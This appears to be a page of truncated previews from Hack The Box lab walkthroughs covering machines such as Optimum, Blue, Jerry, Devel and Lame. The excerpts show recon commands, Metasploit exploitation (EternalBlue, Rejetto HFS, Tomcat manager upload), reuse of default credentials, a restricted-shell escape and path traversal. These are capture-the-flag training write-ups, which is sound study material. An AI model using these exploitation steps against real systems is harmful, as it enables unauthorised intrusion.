HTB Optimum

$nmap -A -sV -p- $nikto -h $searchsploit hfs $cat /usr/share/exploitdb/exploits/windows/remote/346 msf5 > search hfs msf5 > use 1 msf5 exploit(windows/http/rejetto_hfs_exec) > options msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost msf5 exploit(windows/http/rejetto_hfs_exec) > run meterpreter > ls meterpreter > cat user.txt.txt meterpreter > getuid meterpreter > sysinfo Sysinfo shows that we are in a Windows 2012 R2 server with x64 bits architecture. Due to the fact that the default reverse_tcp

HTB Blue

$nmap -A -T4 -p- -sV Result analysis:   135: windows rpc 139: smb  445: smb  OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) $nmap -p 445 –script vuln msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > options msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit C:\Windows\system32>whoami C:\Users>dir C:\Users>cd haris C:\Users\haris>cd Desktop C:\Users\haris\Desktop>dir C:\Users\haris\Desktop>type user.txt C:\Users>cd Administrator C:\Users\Administrator>cd Desktop C:\Users\Administrator\Desktop>dir C:\Users\Administrator\Desktop>type root.txt

HTB Jerry

$nmap -A -T4 -p- -sV -Pn $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e $nikto -h Access to  Use credentials found on Nikto’s results (tomcat/s3cret) As we can observe, we are able to upload and deploy a WAR file. msf5 > use exploit/multi/http/tomcat_mgr_uploadmsf5 exploit(multi/http/tomcat_mgr_upload) > options msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost msf5 exploit(multi/http/tomcat_mgr_upload) > set

HTB Devel

 $nmap -T4 -sV -p- -A Open ports detected: 21/tcp open  ftp     Microsoft ftpd 80/tcp open  http    Microsoft IIS httpd 7.5  $nikto -h $nmap -p 80 –script vuln $nmap -p 21 –script vuln  $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt Nothing much useful was found until this point. $ftp ftp> dir ftp> put test.txt ftp> dir So, if we can upload any file, can we

HTB Legacy

$sudo nmap -A -T4 -p- Open ports detected: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Based on the detected ports, we have SMB here. $ msfconsole msf5 > use auxiliary/scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) > options msf5 auxiliary(scanner/smb/smb_version) > run Which smb version do we have? Not sure yet… $nmap -p139 –script smb-protocols -Pn $nmap -p445 –script smb-protocols -Pn According to

HTB Lame

 $nmap -T4 -p- -A -Pn Open ports detected: 21/tcp  open  ftp vsftpd 2.3.4 22/tcp  open  ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 139/tcp  open  netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))  $ftp No files are detected.  $ssh  $msfconsole Install Searchsploit $sudo apt update && sudo apt -y install exploitdb$searchsploit

HTB Starting Point – Base

$./ Ports detected:22/tcp open  ssh  OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open  http Apache httpd 2.4.29 ((Ubuntu)) $gobuster dir -u -w /usr/share/wordlists/dirb/big.txt Interesting items found: /_uploaded and /login Access to The login folder can be listed (Due to a misconfiguration of the webserver) Foothold Download all three files to analyze them. login.php.swp is a binary file. $ls -la $file login.php.swp As it is described, login.php.swp

HTB Starting Point – Guard

$./ Ssh port is open. Let’s try the last ssh user we obtained.   $ssh -i id_rsa daniel@ The SSH login gives us access to a restricted shell, where the commands like find, cat and python are disabled.  We are unable to read user.txt from this shell. Man command can be used to spawn a bash shell. Once the command opens the manual, we can enter the following command to spawn a

HTB Starting Point – Markup

 $./ Open ports: 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) 443/tcp open ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt Apache service is running. Let’s try to access the site. Access to In the previous machine, we found credentials stored in an SQL dump.  Let’s try to reuse them, to log into the application.  The

HTB Starting Point – Included

$./ Open ports detected:80/tcp open  http   Apache httpd 2.4.29 ((Ubuntu)) Access to: redirection to Use Owasp-Zap to scan this site: This machine is vulnerable to a File Inclusion Path Traversal attack. According to the application description: The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a